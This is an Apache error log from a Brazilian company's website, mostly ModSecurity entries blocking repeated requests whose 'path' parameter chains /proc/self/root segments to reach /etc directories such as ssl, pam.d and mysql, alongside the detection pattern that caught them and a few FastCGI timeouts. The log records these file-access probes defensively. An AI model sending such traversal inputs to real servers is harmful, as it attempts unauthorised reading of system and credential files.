[Thu Mar 19 03:00:33.777109 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:57022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRAcdf6f5d65gmYZQyeQAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:00:42.974119 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:41730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRCta6ubjKNq_cu4b7zQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:00:45.303774 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40066] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:01:01.453594 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:49598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRHfu8EFLIOrSqIptcQgAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:01:10.153808 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:01:11.647699 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.241.31:47760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRJ1_V7PWP6ixUYl572wAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:01:20.057218 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.241.31:41292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRMBkFeYa1D6dYQnCsagAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:01:23.743089 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:38750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRMwbLMZ6AikZjR9UdAQAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:01:25.540796 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.244.43:34906] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuRNRkFeYa1D6dYQnCsbAAAAcE"]
[Thu Mar 19 03:01:35.225097 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.241.31:51862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRP1_V7PWP6ixUYl579AAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:01:35.241799 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:01:39.318973 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:50268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRQ9a6ubjKNq_cu4b78gAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:01:45.581760 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:50272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRRuoXxyEfFpUF8f_RvgAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:01:50.415864 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:50274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRTgkwaGbbGflqUZByQAAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:01:57.659794 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:54480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRVeoXxyEfFpUF8f_RygAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:01:58.133815 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41800] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:01:59.678981 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.241.31:49812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRV_-YZRR_7pZ7nDJNwAAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:02:07.420579 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:49822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRXuyqAr6etmhZHNokVQAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:02:07.422905 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:48704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRXvu8EFLIOrSqIptccwAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:02:11.406851 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:57244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRYxkFeYa1D6dYQnCshwAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:02:13.975660 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:57260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRZcdf6f5d65gmYZQyqQAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:02:20.145819 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42398] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:02:23.479280 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:57264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRb-oXxyEfFpUF8f_R2QAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:02:42.141846 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:02:42.511597 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:33780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRggkwaGbbGflqUZByfQAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Thu Mar 19 03:02:43.276585 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.241.31:50042] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRg_-YZRR_7pZ7nDJN1wAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:03:02.897277 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:50578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRlvu8EFLIOrSqIptckwAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
